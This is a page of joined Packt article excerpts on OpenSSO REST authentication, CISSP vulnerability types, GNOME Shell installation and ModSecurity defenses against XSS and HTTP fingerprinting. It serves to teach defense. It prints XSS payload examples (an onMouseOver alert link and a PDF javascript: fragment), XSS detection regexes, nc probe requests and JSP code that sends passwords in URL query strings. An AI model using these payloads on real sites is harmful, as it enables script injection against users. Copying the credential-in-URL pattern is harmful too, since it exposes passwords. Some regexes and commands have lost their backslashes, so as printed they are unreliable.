An example of such system is integration between an online shopping system, the product provider who actually produces the goods, the insurance company that provides insurance on purchases, and finally the shipping company that delivers the goods to the consumers' hand. All of these systems access some parts of the data, which flows into the other software to perform its job in an efficient way. All the employees can benefit from a single sign-on solution, which keeps them free from having to authenticate themselves multiple times during the working day. Another example can be a travel portal, whose clients need to communicate with many other systems to plan their traveling. Integration between an in-house system and external partners can happen in different levels, from communication protocol and data format to security policies, authentication, and authorization. Because of the variety of communication models, policies, and client types that each partner may use, unifying the security model is almost impossible and the urge for some kind of integration mechanism shows itself bolder and bolder. SSO as a concept and OpenSSO as a product address this urge for integrating the systems' security together. OpenSSO provides developers with several client interfaces to interact with OpenSSO to perform authentication, authorization, session and identity management, and audition. These interfaces include Client SDK for different programming languages and using standards including: Liberty Alliance Project and Security Assertion Markup Language (SAML) for authentication and single sign-on (SSO) XML Access Control Markup Language (XACML) for authorization functions Service Provisioning Markup Language (SPML) for identity management functions. Using the client SDKs and standards mentioned above are suitable when we are developing custom solutions or integrating our system with partners, which are already using them in their security infrastructure. For any other scenario these methods are overkill for developers. To make it easier for the developers to interact with OpenSSO core services the Identity Web Services are provided. We discussed IWS briefly in OpenSSO functionalities section. The IWS are included in OpenSSO to perform the tasks included in the following table. Task Description Authentication and Single sign-on Verifying the user credentials or its authentication token. Authorization Checking the authenticated user's permissions for accessing a resource. Provisioning Creating, deleting, searching, and editing users. Logging Ability to audit and record operations. IWS are exposed in two models—the first model is the WS-* compliant SOAP-based Web Services and the second model is a very simple but elegant RESTful set of services based on HTTP and REST principles. Finally, the third way of using OpenSSO is deploying the policy agents to protect the resources available in a container. In the following section we will use RESTful interface to perform authentication, authorization, and SSO. Authenticating users by the RESTful interface Performing authentication using the RESTful Web Services interface is very simple as it is just like performing a pure HTTP communication with an HTTP server. For each type of operation there is one URL, which may have some required parameters and the output is what we can expect from that operation. The URL for authentication operation along with its parameters is as follows: Operation: Authentication Operation URL: http://host:port/OpenSSOContext/identity/authenticate Parameters: username, password, uri Output: subjectid The Operation URL specifies the address of a Servlet which will receive the required parameters, perform the operation, and write back the result. In the template included above we have the host, port, and OpenSSOContext which are things we already know. After the context we have the path to the RESTful service we want to invoke. The path includes the task type, which can be one of the tasks included in the IWS task lists table and the operation we want to invoke. All parameters are self-descriptive except the uri. We pass a URL to have our users redirected to it after the authentication is performed. This URL can include information related to the user or the original resource which the user has requested. In the case of successful authentication we will receive a subjectid, which we can use in any other RESTful operation like authorization, to log in, log out, and so on. If you remember session ID from your web development experience, subjected is the same as session ID. You can view all sessions along with related information from the OpenSSO administration console homepage under the Sessions tab. The following listing shows a sample JSP page which performs a RESTful call over OpenSSO to authenticate a user and obtain a session ID for the user if they get authenticated. <%try {String operationURL ="http://gfbook.pcname.com:8080/opensso/identity/authenticate";String username = "james";String password = "james";username = java.net.URLEncoder.encode(username, "UTF-8");password = java.net.URLEncoder.encode(password, "UTF-8");String operationString = operationURL + "?username=" +username +"&password=" + password;java.net.URL Operation = new java.net.URL(operationString);java.net.HttpURLConnection connection =(java.net.HttpURLConnection)Operation.openConnection();int responseCode = connection.getResponseCode();if (responseCode == java.net.HttpURLConnection.HTTP_OK) {java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader((java.io.InputStream) connection.getContent()));out.println("<h2>Subject ID</h2>");String line = reader.readLine();out.println(line);}} catch (Exception e) {e.printStackTrace();}%> REST made straightforward tasks easier than ever. Without using REST we would have dealt with complexity of SOAP and WSDL and so on but with REST you can understand the whole code with the first scan. Beginning from the top, we define the REST operation URL, which is assembled using the operation URL and appending the required parameters using the parameters name and the parameters value. The URL that we will connect to it will be something like: http://gfbook.pcname.com:8080/opensso/identity/authenticate?username=james&password=james After assembling the URL we open a network connection to authenticate it. After opening the connection we can check to see whether we received an HTTP_OK response from the server or not. Receiving the HTTP_OK means that the authentication was successful and we can read the subjectid from the socket. The connection may result in other response codes like HTTP_UNAUTHORIZED (HTTP Error code 401) when the credentials are not valid. A complete list of possible return values can be found at http://java.sun.com/javase/6/docs/api/java/net/HttpURLConnection.html. Authorizing using REST If you remember in Configuring OpenSSO for authentication and authorization section we defined a rule that was set to police http://gfbook.pcname.com:8080/ URL for us. And later on we applied the policy rule to a group of users that we created; now we want to check and see how our policy works. In every security system, before any authorization process, an authentication process should compete with a positive result. In our case the result for the authentication is subjectid, which the authorization process will use to check whether the authenticated entity is allowed to perform the action or not. The URL for the authorization operation along with its parameters is as follows: Operation: Authorization Operation URL: http://host:port/OpenSSOContext/identity/authorize Parameters: uri, action, subjectid Output: True or false based on the permission of subject over the entity and given action The combination of uri, action, and subjectid specifies that we want to check our client, identified by subjectid, permission for performing the specified action on the resource identified by the uri. The output of the service invocation is either true or false. The following listing shows how we can check whether an authenticated user has access to a certain resource or not. In the sample code we are checking james, identified by his subjectid we acquired by executing the previous code snippet, against the localhost Protector rule we defined earlier. <%try {String operationURL ="http://gfbook.pcname.com:8080/opensso/identity/authorize";String protectecUrl = " http://127.0.0.1:38080/Conversion-war/";String subjectId ="AQIC5wM2LY4SfcyemVIZX6qBGdyH7b8C5KFJjuuMbw4oj24=@AAJTSQACMDE=#";String action = "POST";protectecUrl = java.net.URLEncoder.encode(protectecUrl, "UTF-8");subjectId = java.net.URLEncoder.encode(subjectId, "UTF-8");String operationString = operationURL + "?uri=" + protectecUrl +"&action=" + action + "&subjectid=" + subjectId;java.net.URL Operation = new java.net.URL(operationString);java.net.HttpURLConnection connection =(java.net.HttpURLConnection) Operation.openConnection();int responseCode = connection.getResponseCode();if (responseCode == java.net.HttpURLConnection.HTTP_OK) {java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader((java.io.InputStream) connection.getContent()));out.println("<h2>authorization Result</h2>");String line = reader.readLine();out.println(line);}} catch (Exception e) {e.printStackTrace();}%> For this listing everything is the same as the authentication process in terms of initializing objects and calling methods, except that in the beginning we define the protected URL string, then we include the subjectid, which is result of our previous authentication. Later on we define the action that we need to check the permission of our authenticated user over it and finally we read the result of authorization. The complete operation after including all parameters is similar to the following snippet: http://gfbook.pcname.com:8080/opensso/identity/authorize?uri=http://127.0.0.1:38080/Conversion-war/&action=POST&subjectid=subjectId Pay attention that two subjectid elements cannot be similar even for the same user on the same machine and same OpenSSO installation. So, before running this code, make sure that you perform the authentication process and include the subjectid resulted from your authentication with the subjectid we specified previously.
Read more
  • 0
  • 0
  • 1542

article-image-cissp-vulnerability-and-penetration-testing-access-control
Packt
12 Mar 2010
6 min read
Save for later

CISSP: Vulnerability and Penetration Testing for Access Control

Packt
12 Mar 2010
6 min read
IT components such as operating systems, application software, and even networks, have many vulnerabilities. These vulnerabilities are open to compromise or exploitation. This creates the possibility for penetration into the systems that may result in unauthorized access and a compromise of confidentiality, integrity, and availability of information assets. Vulnerability tests are performed to identify vulnerabilities while penetration tests are conducted to check the following: The possibility of compromising the systems such that the established access control mechanisms may be defeated and unauthorized access is gained The systems can be shut down or overloaded with malicious data using techniques such as DoS attacks, to the point where access by legitimate users or processes may be denied Vulnerability assessment and penetration testing processes are like IT audits. Therefore, it is preferred that they are performed by third parties. The primary purpose of vulnerability and penetration tests is to identify, evaluate, and mitigate the risks due to vulnerability exploitation. Vulnerability assessment Vulnerability assessment is a process in which the IT systems such as computers and networks, and software such as operating systems and application software are scanned in order to indentify the presence of known and unknown vulnerabilities. Vulnerabilities in IT systems such as software and networks can be considered holes or errors. These vulnerabilities are due to improper software design, insecure coding, or both. For example, buffer overflow is a vulnerability where the boundary limits for an entity such as variables and constants are not properly defined or checked. This can be compromised by supplying data which is greater than what the entity can hold. This results in a memory spill over into other areas and thereby corrupts the instructions or code that need to be processed by the microprocessor. When a vulnerability is exploited it results in a security violation, which will result in a certain impact. A security violation may be an unauthorized access, escalation of privileges, or denial-of-service to the IT systems. Tools are used in the process of identifying vulnerabilities. These tools are called vulnerability scanners. A vulnerability scanning tool can be a hardware-based or software application. Generally, vulnerabilities can be classified based on the type of security error. A type is a root cause of the vulnerability. Vulnerabilities can be classified into the following types: Access Control Vulnerabilities It is an error due to the lack of enforcement pertaining to users or functions that are permitted, or denied, access to an object or a resource. Examples: Improper or no access control list or table No privilege model Inadequate file permissions Improper or weak encoding Security violation and impact: Files, objects, or processes can be accessed directly without authenticationor routing. Authentication Vulnerabilities It is an error due to inadequate identification mechanisms so that a user or a process is not correctly identified. Examples: Weak or static passwords Improper or weak encoding, or weak algorithms Security violation and impact: An unauthorized, or less privileged user (for example, Guest user), or a less privileged process gains higher privileges, such as administrative or root access to the system Boundary Condition Vulnerabilities It is an error due to inadequate checking and validating mechanisms such that the length of the data is not checked or validated against the size of the data storage or resource. Examples: Buffer overflow Overwriting the original data in the memory Security violation and impact: Memory is overwritten with some arbitrary code so that is gains access to programs or corrupts the memory. This will ultimately crash the operating system. An unstable system due to memory corruption may be exploited to get command prompt, or shell access, by injecting an arbitrary code Configuration Weakness Vulnerabilities It is an error due to the improper configuration of system parameters, or leaving the default configuration settings as it is, which may not be secure. Examples: Default security policy configuration File and print access in Internet connection sharing Security violation and impact: Most of the default configuration settings of many software applications are published and are available in the public domain. For example, some applications come with standard default passwords. If they are not secured, they allow an attacker to compromise the system. Configuration weaknesses are also exploited to gain higher privileges resulting in privilege escalation impacts. Exception Handling Vulnerabilities It is an error due to improper setup or coding where the system fails to handle, or properly respond to, exceptional or unexpected data or conditions. Example: SQL Injection Security violation and impact: By injecting exceptional data, user credentials can be captured by an unauthorized entity Input Validation Vulnerabilities It is an error due to a lack of verification mechanisms to validate the input data or contents. Examples: Directory traversal Malformed URLs Security violation and impact: Due to poor input validation, access to system-privileged programs may be obtained. Randomization Vulnerabilities It is an error due to a mismatch in random data or random data for the process. Specifically, these vulnerabilities are predominantly related to encryption algorithms. Examples: Weak encryption key Insufficient random data Security violation and impact: Cryptographic key can be compromised which will impact the data and access security. Resource Vulnerabilities It is an error due to a lack of resources availability for correct operations or processes. Examples: Memory getting full CPU is completely utilized Security violation and impact: Due to the lack of resources the system becomes unstable or hangs. This results in a denial of services to the legitimate users. State Error It is an error that is a result of the lack of state maintenance due to incorrect process flows. Examples: Opening multiple tabs in web browsers Security violation and impact: There are specific security attacks, such as Cross-site scripting (XSS), that will result in user-authenticated sessions being hijacked. Information security professionals need to be aware of the processes involved in identifying system vulnerabilities. It is important to devise suitable countermeasures, in a cost effective and efficient way, to reduce the risk factor associated with the identified vulnerabilities. Some such measures are applying patches supplied by the application vendors and hardening the systems.
Read more
  • 0
  • 0
  • 4198

article-image-install-gnome-shell-ubuntu-910-karmic-koala
Packt
18 Jan 2010
3 min read
Save for later

Install GNOME-Shell on Ubuntu 9.10 "Karmic Koala"

Packt
18 Jan 2010
3 min read
Remember, these are development builds and preview snapshots, and are still in the early stages. While it appears to be functional (so far) your mileage may vary. Installing GNOME-Shell With the release of Ubuntu 9.10, a GNOME-Shell preview is included in the repositories. This makes it very easy to install (and remove) as needed. The downside is that it is just a snapshot so you are not running the latest-greatest builds. For this reason I've included instructions on installing the package as well as compiling the latest builds. I should also note that GNOME Shell requires reasonable 3D support. This means that it will likely *not* work within a virtual machine. In particular, problems have been reported trying to run GNOME Shell with 3D support in VirtualBox. Package Installation If you'd prefer to install the package and just take a sneak-peek at the snapshot, simply run the command below in your terminal: sudo aptitude install gnome-shell Manual Compilation Manually compiling GNOME Shell will allow you to use the latest and greatest builds, but it can also require more work. The notes below are based on a successful build I did in late 2009, but your mileage may vary. If you run into problems please note the following: Installing GNOME Shell does not affect your current installation, so if the build breaks you should still have a clean environment. You can find more details as well as known issues here: GnomeShell There is one package that you'll need to compile GNOME Shell called jhbuild. This package, however, has been removed from the Ubuntu 9.10 repositories for being outdated. I did find that I could use the package from the 9.04 repository and haven’t noticed any problems in doing so. To install jhbuild from the 9.04 repository use the instructions below: Visit http://packages.ubuntu.com/jaunty/all/jhbuild/download Select a mirror close to you Download / Install the .deb package. I don’t believe there are any additional dependencies needed for this package. After that package is installed you’ll want to download a GNOME Shell Build Setup script which makes this entire process much, much simpler. cd ~ wget http://git.gnome.org/cgit/gnome-shell/plain/tools/build/gnome-shell-build-setup.sh This script will handle finding and installing dependencies as well as compiling the builds, etc. To launch this script, run the command: gnome-shell-build-setup.sh You'll need to ensure that any suggested packages are installed before continuing. You may need to re-run this script multiple times until it has no more warnings. Lastly, you can begin the build process. This process took about twenty minutes on my C2D 2.0Ghz Dell laptop. My build was completely automated, but considering this is building newer and newer builds, your mileage may vary. To begin the build process on your machine, run the command: jhbuild build Ready To Launch Congratulations! You've now got GNOME-Shell installed and ready to launch. I've outlined the steps below. Please take note of the method, depending on how you installed. Also, please note that before you launch GNOME-Shell you must DISABLE Compiz. If you have Compiz running, navigate to System > Preferences > Appearances and disable it under the Desktop Effects tab. Package Installation Launch gnome-shell --replace Manual Compilation It will as follows: ~/gnome-shell/source/gnome-shell/src/gnome-shell --replace
Read more
  • 0
  • 0
  • 3561
article-image-blocking-common-attacks-using-modsecurity-25-part-2
Packt
01 Dec 2009
11 min read
Save for later

Blocking Common Attacks using ModSecurity 2.5: Part 2

Packt
01 Dec 2009
11 min read
Cross-site scripting Cross-site scripting attacks occur when user input is not properly sanitized and ends up in pages sent back to users. This makes it possible for an attacker to include malicious scripts in a page by providing them as input to the page. The scripts will be no different than scripts included in pages by the website creators, and will thus have all the privileges of an ordinary script within the page—such as the ability to read cookie data and session IDs. In this article we will look in more detail on how to prevent attacks. The name "cross-site scripting" is actually rather poorly chosen—the name stems from the first such vulnerability that was discovered, which involved a malicious website using HTML framesets to load an external site inside a frame. The malicious site could then manipulate the loaded external site in various ways—for example, read form data, modify the site, and basically perform any scripting action that a script within the site itself could perform. Thus cross-site scripting, or XSS, was the name given to this kind of attack. The attacks described as XSS attacks have since shifted from malicious frame injection (a problem that was quickly patched by web browser developers) to the class of attacks that we see today involving unsanitized user input. The actual vulnerability referred to today might be better described as a "malicious script injection attack", though that doesn't give it quite as flashy an acronym as XSS. (And in case you're curious why the acronym is XSS and not CSS, the simple explanation is that although CSS was used as short for cross-site scripting in the beginning, it was changed to XSS because so many people were confusing it with the acronym used for Cascading Style Sheets, which is also CSS.) Cross-site scripting attacks can lead not only to cookie and session data being stolen, but also to malware being downloaded and executed and injection of arbitrary content into web pages. Cross-site scripting attacks can generally be divided into two categories: Reflected attacksThis kind of attack exploits cases where the web application takes data provided by the user and includes it without sanitization in output pages. The attack is called "reflected" because an attacker causes a user to provide a malicious script to a server in a request that is then reflected back to the user in returned pages, causing the script to execute. Stored attacksIn this type of XSS attack, the attacker is able to include his malicious payload into data that is permanently stored on the server and will be included without any HTML entity encoding to subsequent visitors to a page. Examples include storing malicious scripts in forum posts or user presentation pages. This type of XSS attack has the potential to be more damaging since it can affect every user who views a certain page. Preventing XSS attacks The most important measure you can take to prevent XSS attacks is to make sure that all user-supplied data that is output in your web pages is properly sanitized. This means replacing potentially unsafe characters, such as angled brackets (< and >) with their corresponding HTML-entity encoded versions—in this case &lt; and &gt;. Here is a list of characters that you should encode when present in user-supplied data that will later be included in web pages: Character HTML-encoded version < &lt; > &gt; ( &#40; ) &#41; # &#35; & &amp; " &quot; ' &#39; In PHP, you can use the htmlentities() function to achieve this. When encoded, the string <script> will be converted into &lt;script&gt;. This latter version will be displayed as <script> in the web browser, without being interpreted as the start of a script by the browser. In general, users should not be allowed to input any HTML markup tags if it can be avoided. If you do allow markup such as <a href="..."> to be input by users in blog comments, forum posts, and similar places then you should be aware that simply filtering out the <script> tag is not enough, as this simple example shows: <a href="http://www.google.com" onMouseOver="javascript:alert('XSS Exploit!')">Innocent link</a> This link will execute the JavaScript code contained within the onMouseOver attribute whenever the user hovers his mouse pointer over the link. You can see why even if the web application replaced <script> tags with their HTML-encoded version, an XSS exploit would still be possible by simply using onMouseOver or any of the other related events available, such as onClick or onMouseDown. I want to stress that properly sanitizing user input as just described is the most important step you can take to prevent XSS exploits from occurring. That said, if you want to add an additional line of defense by creating ModSecurity rules, here are some common XSS script fragments and regular expressions for blocking them: Script fragment Regular expression <script <script eval( evals*( onMouseOver onmouseover onMouseOut onmouseout onMouseDown onmousedown onMouseMove onmousemove onClick onclick onDblClick ondblclick onFocus onfocus PDF XSS protection You may have seen the ModSecurity directive SecPdfProtect mentioned, and wondered what it does. This directive exists to protect users from a particular class of cross-site scripting attack that affects users running a vulnerable version of the Adobe Acrobat PDF reader. A little background is required in order to understand what SecPdfProtect does and why it is necessary. In 2007, Stefano Di Paola and Giorgio Fedon discovered a vulnerability in Adobe Acrobat that allows attackers to insert JavaScript into requests, which is then executed by Acrobat in the context of the site hosting the PDF file. Sound confusing? Hang on, it will become clearer in a moment. The vulnerability was quickly fixed by Adobe in version 7.0.9 of Acrobat. However, there are still many users out there running old versions of the reader, which is why preventing this sort of attack is still an ongoing concern. The basic attack works like this: An attacker entices the victim to click a link to a PDF file hosted on www.example.com. Nothing unusual so far, except for the fact that the link looks like this: http://www.example.com/document.pdf#x=javascript:alert('XSS'); Surprisingly, vulnerable versions of Adobe Acrobat will execute the JavaScript in the above link. It doesn't even matter what you place before the equal sign, gibberish= will work just as well as x= in triggering the exploit. Since the PDF file is hosted on the domain www.example.com, the JavaScript will run as if it was a legitimate piece of script within a page on that domain. This can lead to all of the standard cross-site scripting attacks that we have seen examples of before. This diagram shows the chain of events that allows this exploit to function: The vulnerability does not exist if a user downloads the PDF file and then opens it from his local hard drive. ModSecurity solves the problem of this vulnerability by issuing a redirect for all PDF files. The aim is to convert any URLs like the following: http://www.example.com/document.pdf#x=javascript:alert('XSS'); into a redirected URL that has its own hash character: http://www.example.com/document.pdf#protection This will block any attacks attempting to exploit this vulnerability. The only problem with this approach is that it will generate an endless loop of redirects, as ModSecurity has no way of knowing what is the first request for the PDF file, and what is a request that has already been redirected. ModSecurity therefore uses a one-time token to keep track of redirect requests. All redirected requests get a token included in the new request string. The redirect link now looks like this: http://www.example.com/document.pdf?PDFTOKEN=XXXXX#protection ModSecurity keeps track of these tokens so that it knows which links are valid and should lead to the PDF file being served. Even if a token is not valid, the PDF file will still be available to the user, he will just have to download it to the hard drive. These are the directives used to configure PDF XSS protection in ModSecurity: SecPdfProtect On SecPdfProtectMethod TokenRedirection SecPdfProtectSecret "SecretString" SecPdfProtectTimeout 10 SecPdfProtectTokenName "token" The above configures PDF XSS protection, and uses the secret string SecretString to generate the one-time tokens. The last directive, SecPdfProtectTokenName, can be used to change the name of the token argument (the default is PDFTOKEN). This can be useful if you want to hide the fact that you are running ModSecurity, but unless you are really paranoid it won't be necessary to change this. The SecPdfProtectMethod can also be set to ForcedDownload, which will force users to download the PDF files instead of viewing them in the browser. This can be an inconvenience to users, so you would probably not want to enable this unless circumstances warrant (for example, if a new PDF vulnerability of the same class is discovered in the future). HttpOnly cookies to prevent XSS attacks One mechanism to mitigate the impact of XSS vulnerabilities is the HttpOnly flag for cookies. This extension to the cookie protocol was proposed by Microsoft (see http://msdn.microsoft.com/en-us/library/ms533046.aspx for a description), and is currently supported by the following browsers: Internet Explorer (IE6 SP1 and later) Firefox (2.0.0.5 and later) Google Chrome (all versions) Safari (3.0 and later) Opera (version 9.50 and later) HttpOnly cookies work by adding the HttpOnly flag to cookies that are returned by the server, which instructs the web browser that the cookie should only be used when sending HTTP requests to the server and should not be made available to client-side scripts via for example the document.cookie property. While this doesn't completely solve the problem of XSS attacks, it does mitigate those attacks where the aim is to steal valuable information from the user's cookies, such as for example session IDs. A cookie header with the HttpOnly flag set looks like this: Set-Cookie: SESSID=d31cd4f599c4b0fa4158c6fb; HttpOnly HttpOnly cookies need to be supported on the server-side for the clients to be able to take advantage of the extra protection afforded by them. Some web development platforms currently support HttpOnly cookies through the use of the appropriate configuration option. For example, PHP 5.2.0 and later allow HttpOnly cookies to be enabled for a page by using the following ini_set() call: <?php ini_set("session.cookie_httponly", 1); ?> Tomcat (a Java Servlet and JSP server) version 6.0.19 and later supports HttpOnly cookies, and they can be enabled by modifying a context's configuration so that it includes the useHttpOnly option, like so: <Context> <Manager useHttpOnly="true" /> </Context> In case you are using a web platform that doesn't support HttpOnly cookies, it is actually possible to use ModSecurity to add the flag to outgoing cookies. We will see how to do this now. Session identifiers Assuming we want to add the HttpOnly flag to session identifier cookies, we need to know which cookies are associated with session identifiers. The following table lists the name of the session identifier cookie for some of the most common languages: Language Session identifier cookie name PHP PHPSESSID JSP JSESSIONID ASP ASPSESSIONID ASP.NET ASP.NET_SessionId The table shows us that a good regular expression to identify session IDs would be (sessionid|sessid), which can be shortened to sess(ion)?id. The web programming language you are using might use another name for the session cookie. In that case, you can always find out what it is by looking at the headers returned by the server: echo -e "GET / HTTP/1.1nHost:yourserver.comnn"|nc yourserver.com 80|head Look for a line similar to: Set-Cookie: JSESSIONID=4EFA463BFB5508FFA0A3790303DE0EA5; Path=/ This is the session cookie—in this case the name of it is JESSIONID, since the server is running Tomcat and the JSP web application language. The following rules are used to add the HttpOnly flag to session cookies: # # Add HttpOnly flag to session cookies # SecRule RESPONSE_HEADERS:Set-Cookie "!(?i:HttpOnly)" "phase:3,chain,pass" SecRule MATCHED_VAR "(?i:sess(ion)?id)" "setenv:session_ cookie=%{MATCHED_VAR}" Header set Set-Cookie "%{SESSION_COOKIE}e; HttpOnly" env=session_ cookie We are putting the rule chain in phase 3—RESPONSE_HEADERS, since we want to inspect the response headers for the presence of a Set-Cookie header. We are looking for those Set-Cookie headers that do not contain an HttpOnly flag. The (?i: ) parentheses are a regular expression construct known as a mode-modified span. This tells the regular expression engine to ignore the case of the HttpOnly string when attempting to match. Using the t:lowercase transform would have been more complicated, as we will be using the matched variable in the next rule, and we don't want the case of the variable modified when we set the environment variable.
Read more
  • 0
  • 0
  • 3825

article-image-blocking-common-attacks-using-modsecurity-25-part-1
Packt
01 Dec 2009
11 min read
Save for later

Blocking Common Attacks using ModSecurity 2.5: Part 1

Packt
01 Dec 2009
11 min read
Web applications can be attacked from a number of different angles, which is what makes defending against them so difficult. Here are just a few examples of where things can go wrong to allow a vulnerability to be exploited: The web server process serving requests can be vulnerable to exploits. Even servers such as Apache, that have a good security track record, can still suffer from security problems - it's just a part of the game that has to be accepted. The web application itself is of course a major source of problems. Originally, HTML documents were meant to be just that - documents. Over time, and especially in the last few years, they have evolved to also include code, such as client-side JavaScript. This can lead to security problems. A parallel can be drawn to Microsoft Office, which in earlier versions was plagued by security problems in its macro programming language. This, too, was caused by documents and executable code being combined in the same file. Supporting modules, such as mod_php which is used to run PHP scripts, can be subject to their own security vulnerabilities. Backend database servers, and the way that the web application interacts with them, can be a source of problems ranging from disclosure of confidential information to loss of data. HTTP fingerprinting Only amateur attackers blindly try different exploits against a server without having any idea beforehand whether they will work or not. More sophisticated adversaries will map out your network and system to find out as much information as possible about the architecture of your network and what software is running on your machines. An attacker looking to break in via a web server will try to find one he knows he can exploit, and this is where a method known as HTTP fingerprinting comes into play. We are all familiar with fingerprinting in everyday life - the practice of taking a print of the unique pattern of a person's finger to be able to identify him or her - for purposes such as identifying a criminal or opening the access door to a biosafety laboratory. HTTP fingerprinting works in a similar manner by examining the unique characteristics of how a web server responds when probed and constructing a fingerprint from the gathered information. This fingerprint is then compared to a database of fingerprints for known web servers to determine what server name and version is running on the target system. More specifically, HTTP fingerprinting works by identifying subtle differences in the way web servers handle requests - a differently formatted error page here, a slightly unusual response header there - to build a unique profile of a server that allows its name and version number to be identified. Depending on which viewpoint you take, this can be useful to a network administrator to identify which web servers are running on a network (and which might be vulnerable to attack and need to be upgraded), or it can be useful to an attacker since it will allow him to pinpoint vulnerable servers. We will be focusing on two fingerprinting tools: httprint One of the original tools - the current version is 0.321 from 2005, so it hasn't been updated with new signatures in a while. Runs on Linux, Windows, Mac OS X, and FreeBSD. httprecon This is a newer tool which was first released in 2007. It is still in active development. Runs on Windows. Let's first run httprecon against a standard Apache 2.2 server: And now let's run httprint against the same server and see what happens: As we can see, both tools correctly guess that the server is running Apache. They get the minor version number wrong, but both tell us that the major version is Apache 2.x. Try it against your own server! You can download httprint at http://www.net-square.com/httprint/ and httprecon at http://www.computec.ch/projekte/httprecon/. Tip If you get the error message Fingerprinting Error: Host/URL not found when running httprint, then try specifying the IP address of the server instead of the hostname. The fact that both tools are able to identify the server should come as no surprise as this was a standard Apache server with no attempts made to disguise it. In the following sections, we will be looking at how fingerprinting tools distinguish different web servers and see if we are able to fool them into thinking the server is running a different brand of web server software. How HTTP fingerprinting works There are many ways a fingerprinting tool can deduce which type and version of web server is running on a system. Let's take a look at some of the most common ones. Server banner The server banner is the string returned by the server in the Server response header (for example: Apache/1.3.3 (Unix) (Red Hat/Linux)). This banner can be changed by using the ModSecurity directive SecServerSignature. Here is what to do to change the banner: # Change the server banner to MyServer 1.0ServerTokens FullSecServerSignature "MyServer 1.0" Response header The HTTP response header contains a number of fields that are shared by most web servers, such as Server, Date, Accept-Ranges, Content-Length, and Content-Type. The order in which these fields appear can give a clue as to which web server type and version is serving the response. There can also be other subtle differences - the Netscape Enterprise Server, for example, prints its headers as Last-modified and Accept-ranges, with a lowercase letter in the second word, whereas Apache and Internet Information Server print the same headers as Last-Modified and Accept-Ranges. HTTP protocol responses An other way to gain information on a web server is to issue a non-standard or unusual HTTP request and observe the response that is sent back by the server. Issuing an HTTP DELETE request The HTTP DELETE command is meant to be used to delete a document from a server. Of course, all servers require that a user is authenticated before this happens, so a DELETE command from an unauthorized user will result in an error message - the question is just which error message exactly, and what HTTP error number will the server be using for the response page? Here is a DELETE request issued to our Apache server: $ nc bytelayer.com 80DELETE / HTTP/1.0HTTP/1.1 405 Method Not AllowedDate: Mon, 27 Apr 2009 09:10:49 GMTServer: Apache/2.2.8 (Fedora) mod_jk/1.2.27 DAV/2Allow: GET,HEAD,POST,OPTIONS,TRACEContent-Length: 303Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method DELETE is not allowed for the URL /index.html.</p><hr><address>Apache/2.2.8 (Fedora) mod_jk/1.2.27 DAV/2 Server at www.bytelayer.com Port 80</address></body></html> As we can see, the server returned a 405 - Method Not Allowed error. The error message accompanying this response in the response body is given as The requested method DELETE is not allowed for the URL/index.html. Now compare this with the following response, obtained by issuing the same request to a server at www.iis.net: $ nc www.iis.net 80DELETE / HTTP/1.0HTTP/1.1 405 Method Not AllowedAllow: GET, HEAD, OPTIONS, TRACEContent-Type: text/htmlServer: Microsoft-IIS/7.0Set-Cookie: CSAnonymous=LmrCfhzHyQEkAAAANWY0NWY1NzgtMjE2NC00NDJjLWJlYzYtNTc4ODg0OWY5OGQz0; domain=iis.net; expires=Mon, 27-Apr-2009 09:42:35GMT; path=/; HttpOnlyX-Powered-By: ASP.NETDate: Mon, 27 Apr 2009 09:22:34 GMTConnection: closeContent-Length: 1293<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html ><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>405 - HTTP verb used to access this page is not allowed.</title><style type="text/css"><!--body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica,sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;}h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;}h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;fontfamily:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style>< /head><body><div id="header"><h1>Server Error</h1></div><div id="content"><div class="content-container"><fieldset> <h2>405 - HTTP verb used to access this page is not allowed.</h2> <h3>The page you are looking for cannot be displayed because aninvalid method (HTTP verb) was used to attempt access.</h3> </fieldset></div></div></body></html> The site www.iis.net is Microsoft's official site for its web server platform Internet Information Services, and the Server response header indicates that it is indeed running IIS-7.0. (We have of course already seen that it is a trivial operation in most cases to fake this header, but given the fact that it's Microsoft's official IIS site we can be pretty sure that they are indeed running their own web server software.) The response generated from IIS carries the same HTTP error code, 405; however there are many subtle differences in the way the response is generated. Here are just a few: IIS uses spaces in between method names in the comma separated list for the Allow field, whereas Apache does not The response header field order differs - for example, Apache has the Date field first, whereas IIS starts out with the Allow field IIS uses the error message The page you are looking for cannot be displayed because an invalid method (HTTP verb) was used to attempt access in the response body Bad HTTP version numbers A similar experiment can be performed by specifying a non-existent HTTP protocol version number in a request. Here is what happens on the Apache server when the request GET / HTTP/5.0 is issued: $ nc bytelayer.com 80GET / HTTP/5.0HTTP/1.1 400 Bad RequestDate: Mon, 27 Apr 2009 09:36:10 GMTServer: Apache/2.2.8 (Fedora) mod_jk/1.2.27 DAV/2Content-Length: 295Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could notunderstand.<br /></p><hr><address>Apache/2.2.8 (Fedora) mod_jk/1.2.27 DAV/2 Server at www.bytelayer.com Port 80</address></body></html> There is no HTTP version 5.0, and there probably won't be for a long time, as the latest revision of the protocol carries version number 1.1. The Apache server responds with a 400 - Bad Request Error, and the accompanying error message in the response body is Your browser sent a request that this server could not understand. Now let's see what IIS does: $ nc www.iis.net 80GET / HTTP/5.0HTTP/1.1 400 Bad RequestContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 27 Apr 2009 09:38:37 GMTConnection: closeContent-Length: 334<!DOCTYPE HTML PUBLIC 